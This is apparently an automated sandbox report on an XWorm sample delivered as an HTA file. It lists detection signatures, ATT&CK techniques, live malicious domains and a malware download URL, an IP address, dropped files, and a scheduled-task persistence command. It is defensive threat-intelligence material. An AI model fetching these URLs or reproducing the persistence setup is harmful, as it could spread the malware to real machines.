Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob

Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 32.3.Carter.pif.3db2268.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.3.Carter.pif.3e14c38.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.RegAsm.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.3.Carter.pif.3db2268.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.3.Carter.pif.3e14c38.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000003.3491947145.000000000184B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.3546191644.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.3546191644.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.3546191644.0000000003DFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.4143164182.00000000009E2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.4145311596.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.3546306644.0000000003E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.3546191644.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Carter.pif PID: 9172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5928, type: MEMORYSTR

Source: DanielPulse.scr	Binary or memory string: WIN_81
Source: DanielPulse.scr	Binary or memory string: WIN_XP
Source: DanielPulse.scr	Binary or memory string: WIN_XPe
Source: DanielPulse.scr	Binary or memory string: WIN_VISTA
Source: DanielPulse.scr	Binary or memory string: WIN_7
Source: DanielPulse.scr	Binary or memory string: WIN_8
Source: DanielPulse.scr.32.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 32.3.Carter.pif.3db2268.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.3.Carter.pif.3e14c38.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.RegAsm.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.3.Carter.pif.3db2268.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.3.Carter.pif.3e14c38.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000003.3491947145.000000000184B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.3546191644.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.3546191644.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.3546191644.0000000003DFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.4143164182.00000000009E2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.4145311596.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.3546306644.0000000003E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.3546191644.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Carter.pif PID: 9172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5928, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C6696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	32_2_00C6696E
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C66E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	32_2_00C66E32
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FC696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	40_2_00FC696E
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FC6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	40_2_00FC6E32
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F3696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	42_2_00F3696E
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F36E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	42_2_00F36E32

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	211 Scripting	2 Valid Accounts	11 Windows Management Instrumentation	211 Scripting	1 Exploitation for Privilege Escalation	21 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	3 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Email Collection	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Command and Scripting Interpreter	1 Scheduled Task/Job	21 Access Token Manipulation	2 Software Packing	NTDS	39 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Scheduled Task/Job	2 Registry Run Keys / Startup Folder	212 Process Injection	1 DLL Side-Loading	LSA Secrets	61 Security Software Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	3 PowerShell	RC Scripts	1 Scheduled Task/Job	111 Masquerading	Cached Domain Credentials	51 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	2 Valid Accounts	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	51 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	8%	ReversingLabs
C:\Users\user\AppData\Local\Temp\220239\Carter.pif	8%	ReversingLabs
C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\msword\msword.exe	8%	ReversingLabs

Source	Detection	Scanner	Label
https://myguyapp.com/	0%	Avira URL Cloud	safe
https://myguyapp.com/bo.jsQ	0%	Avira URL Cloud	safe
https://myguyapp.com/bo.js9	0%	Avira URL Cloud	safe
https://myguyapp.com/a&dZ	0%	Avira URL Cloud	safe
https://myguyapp.com/f.pdf	0%	Avira URL Cloud	safe
https://myguyapp.c	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zip	100%	Avira URL Cloud	malware
https://myguyapp.com/bo.js	0%	Avira URL Cloud	safe
https://myguyapp.com/bo.jsY	0%	Avira URL Cloud	safe
me-work.com	0%	Avira URL Cloud	safe
https://myguyapp.com/bo.jsScripting.FileSystemObject	0%	Avira URL Cloud	safe
http://myguyapp.co	0%	Avira URL Cloud	safe
https://myguyapp.com/f.pdf?q	0%	Avira URL Cloud	safe
http://myguyapp.com/msword.zip	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
me-work.com	193.26.115.21	true	true	unknown
myguyapp.com	193.26.115.21	true	true	unknown
x1.i.lencr.org	unknown	unknown	false	high
dwLscOsEZmpbOxr.dwLscOsEZmpbOxr	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://myguyapp.com/msword.zip	true	Avira URL Cloud: malware	unknown
https://myguyapp.com/bo.js	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/f.pdf	true	Avira URL Cloud: safe	unknown
me-work.com	true	Avira URL Cloud: safe	unknown
http://myguyapp.com/msword.zip	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 0000000A.00000003.1772962083.0000022C7D11A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myguyapp.com/	mshta.exe, 00000000.00000002.4143659814.00000000029C6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	msword.exe, 00000016.00000003.2180955166.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmp, Carter.pif, 00000020.00000003.2212981641.000000000406B000.00000004.00000800.00020000.00000000.sdmp, DanielPulse.scr, 00000028.00000002.2254485808.0000000001019000.00000002.00000001.01000000.00000011.sdmp, DanielPulse.scr, 0000002A.00000002.2356871731.0000000000F89000.00000002.00000001.01000000.00000011.sdmp, DanielPulse.scr.32.dr	false		high
https://g.live.com/odclientsettings/ProdV2	svchost.exe, 0000000A.00000003.1772962083.0000022C7D0C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 0000000A.00000003.1772962083.0000022C7D0C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myguyapp.com/a&dZ	mshta.exe, 00000000.00000002.4143659814.00000000029C6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/bo.jsQ	mshta.exe, 00000000.00000002.4143659814.000000000293E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 0000000A.00000002.3422275675.0000022C7CE00000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 0000000A.00000003.1772962083.0000022C7D0A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1772962083.0000022C7D0C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1772962083.0000022C7D107000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1772962083.0000022C7D0F4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myguyapp.c	wscript.exe, wscript.exe, 00000001.00000003.2177573847.0000000005791000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2177638147.0000000005785000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1901529582.0000000005791000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	msword.exe, 00000016.00000000.2177420421.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe, 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe.21.dr	false		high
https://www.autoitscript.com/autoit3/	msword.exe, 00000016.00000003.2180955166.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.2212981641.000000000406B000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000002.4145541931.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, DanielPulse.scr.32.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegAsm.exe, 0000002C.00000002.4145311596.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myguyapp.com/bo.js9	mshta.exe, 00000000.00000002.4148427564.0000000006163000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/bo.jsY	mshta.exe, 00000000.00000002.4143659814.000000000293E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://myguyapp.co	wscript.exe, wscript.exe, 00000001.00000003.2177622605.0000000005789000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2177573847.0000000005791000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2177638147.0000000005789000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2177638147.0000000005785000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1901529582.0000000005791000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2177987329.000000000578F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 0000000A.00000003.1772962083.0000022C7D0C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myguyapp.com/bo.jsScripting.FileSystemObject	mshta.exe, 00000000.00000002.4147429426.0000000005E3C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/f.pdf?q	wscript.exe, 00000001.00000002.2178189802.0000000003398000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.26.115.21	me-work.com	Netherlands		46261	QUICKPACKETUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573240
Start date and time:	2024-12-11 18:02:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	45
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	c2.hta
Detection:	MAL
Classification:	mal100.troj.expl.evad.winHTA@76/83@4/2
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 100% Number of executed functions: 108 Number of non-executed functions: 292
Cookbook Comments:	Found application associated with file extension: .hta Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 2.18.80.170, 92.122.101.58, 92.122.101.8, 50.16.47.176, 34.237.241.83, 18.213.11.84, 54.224.241.105, 162.159.61.3, 172.64.41.3, 2.18.82.9, 23.195.39.65, 23.193.114.8, 23.193.114.34, 4.175.87.197, 23.195.92.153, 13.107.246.63, 172.202.163.200
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
Execution Graph export aborted for target mshta.exe, PID 7232 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: c2.hta

Simulations

Behavior and APIs

Time	Type	Description
12:03:03	API Interceptor	101x Sleep call for process: mshta.exe modified
12:03:04	API Interceptor	102x Sleep call for process: powershell.exe modified
12:03:08	API Interceptor	3x Sleep call for process: svchost.exe modified
12:03:23	API Interceptor	1x Sleep call for process: AcroCEF.exe modified
12:04:30	API Interceptor	3979x Sleep call for process: Carter.pif modified
12:06:06	API Interceptor	3630x Sleep call for process: RegAsm.exe modified
17:03:54	Task Scheduler	Run new task: Wagner path: wscript s>//B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
17:03:55	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.26.115.21	EeSNugjFh5.bat	Get hash	malicious	Unknown	Browse
193.26.115.21	c2.hta	Get hash	malicious	XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
me-work.com	c2.hta	Get hash	malicious	XWorm	Browse	87.120.117.152
me-work.com	p5.hta	Get hash	malicious	XWorm	Browse	45.88.186.197
myguyapp.com	EeSNugjFh5.bat	Get hash	malicious	Unknown	Browse	193.26.115.21
myguyapp.com	c2.hta	Get hash	malicious	XWorm	Browse	193.26.115.21

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
QUICKPACKETUS	EeSNugjFh5.bat	Get hash	malicious	Unknown	Browse	193.26.115.21
	https://webradiojaguar.net/FNB-POP.pdf	Get hash	malicious	Unknown	Browse	172.82.129.154
	c2.hta	Get hash	malicious	XWorm	Browse	193.26.115.21
	Play_VM-NowCRQW.html	Get hash	malicious	HTMLPhisher	Browse	172.82.129.154
	new.ini.ps1	Get hash	malicious	Unknown	Browse	167.88.162.71
	i586.elf	Get hash	malicious	Unknown	Browse	172.82.144.22
	sh4.elf	Get hash	malicious	Mirai	Browse	208.166.51.211
	mips.elf	Get hash	malicious	Unknown	Browse	103.136.150.114
	ppc.elf	Get hash	malicious	Unknown	Browse	103.136.150.114
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	192.255.97.148

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Agreement ATT Confidential -16_08_52-{DATE).docx	Get hash	malicious	Unknown	Browse	193.26.115.21
	T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.26.115.21
	wi86CSarYC.exe	Get hash	malicious	DanaBot	Browse	193.26.115.21
	wi86CSarYC.exe	Get hash	malicious	DanaBot	Browse	193.26.115.21
	https://t.ly/me-ZS	Get hash	malicious	Unknown	Browse	193.26.115.21
	Cj3OWJHzls.lnk	Get hash	malicious	Ducktail	Browse	193.26.115.21
	MdmRznA6gx.lnk	Get hash	malicious	Ducktail	Browse	193.26.115.21
	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	193.26.115.21
37f463bf4616ecd445d4a1937da06e19	peks66Iy06.exe	Get hash	malicious	Unknown	Browse	193.26.115.21
	XXHYneydvF.exe	Get hash	malicious	Unknown	Browse	193.26.115.21
	nt11qTrX4f.exe	Get hash	malicious	Unknown	Browse	193.26.115.21
	otsIBG7J9b.exe	Get hash	malicious	Unknown	Browse	193.26.115.21
	XgijTrY6No.exe	Get hash	malicious	Unknown	Browse	193.26.115.21
	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	193.26.115.21
	CcIlKT6XdC.exe	Get hash	malicious	Amadey, PureLog Stealer, Stealc, Vidar	Browse	193.26.115.21
	PO_11100011211.Vbs.vbs	Get hash	malicious	FormBook	Browse	193.26.115.21
	Reqt 83291.vbs	Get hash	malicious	Remcos, GuLoader	Browse	193.26.115.21
	DOCUMENT#5885588@081366(766.pdf.exe	Get hash	malicious	GuLoader, Remcos	Browse	193.26.115.21

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\220239\Carter.pif	c2.hta	Get hash	malicious	XWorm	Browse
	FwR7as4xUq.exe	Get hash	malicious	Unknown	Browse
	InsertSr.exe	Get hash	malicious	GO Backdoor	Browse
	vqMMwqCFZQ.exe	Get hash	malicious	Unknown	Browse
	fT0L8msd6q.exe	Get hash	malicious	Unknown	Browse
	fT0L8msd6q.exe	Get hash	malicious	Unknown	Browse
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse
	eddzD2MA12.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	c2.hta	Get hash	malicious	XWorm	Browse
	FwR7as4xUq.exe	Get hash	malicious	Unknown	Browse
	InsertSr.exe	Get hash	malicious	GO Backdoor	Browse
	vqMMwqCFZQ.exe	Get hash	malicious	Unknown	Browse
	fT0L8msd6q.exe	Get hash	malicious	Unknown	Browse
	fT0L8msd6q.exe	Get hash	malicious	Unknown	Browse
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse
	eddzD2MA12.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.363788168458258
Encrypted:	false
SSDEEP:	6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
MD5:	0E72F896C84F1457C62C0E20338FAC0D
SHA1:	9C071CC3D15E5BD8BF603391AE447202BD9F8537
SHA-256:	686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
SHA-512:	AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
Malicious:	false
Preview:	*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.310792483363171
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrh:KooCEYhgYEL0In
MD5:	2A88BF1BAD600826D6E1E33A7B6C6A8A
SHA1:	C7CBB7D77C67464C9CB1D84A5E41D6A7CE5782EA
SHA-256:	D1BCFA68AE9C089EB99B639707B0D3BC36935DC07CD2094343BB0FB5981F2DBE
SHA-512:	A4C19FBC46F17947EA3912B9E2FE3A42669E4A085063C0DE9F14CF52F59F1D98748385936BFB3C005C4D0A2E51E24C4E41DD5A739C074DEE52D24B98E4ED8027
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x305fb2ae, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4222108595597559
Encrypted:	false
SSDEEP:	1536:nSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:nazag03A2UrzJDO
MD5:	9EBDB5C266B94094D05035E46BF9BADB
SHA1:	D6E19E1939FA09D65DC7B3BE0A31BD6840460D7D
SHA-256:	D6E01A07EABB0604BB76788604C9BAD760FB345737D4D098BA1546C482FE8F55
SHA-512:	B1E6CB42EC5303994BB3E377F65F39B390F3F6D87823F13C8C340C35C021810DD023BF7C916E6F8C8BC87C5F605AACACBE72C8EB88E57EC25DC8058A1574A758
Malicious:	false
Preview:	0_..... .......Y.......X\...;...{......................n.%..........\|.......\|..h.#..........\|..n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...........................................\|...................U.#.....\|...........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07950783923047264
Encrypted:	false
SSDEEP:	3:ydW/lOetYebDuhjX3IlXlJu3tXpKH8WIuYltUIplXlollOE/tlnl+/rTc:yEtrzbDpTuH68WIdkILepMP
MD5:	97A77A071DA16D12CED5D37F98193F2C
SHA1:	7AA3874B173E80515D92479BBA1DC899A35831E8
SHA-256:	0D36FA97838EDB409F187519345C7B673E658286A2FFF57089786209659FEBB4
SHA-512:	014C66686AF6CA4FC9305B9710CEB90D300C92A60DFB19E9E34B7714BD01C9D49CEBE3FB238B2D668E2BCE5A9EC9D0E6FAA8B6F503138041C6C64F81275900B8
Malicious:	false
Preview:	..0......................................;...{.......\|.......\|...............\|.......\|.....~.....\|...................U.#.....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.229115913404077
Encrypted:	false
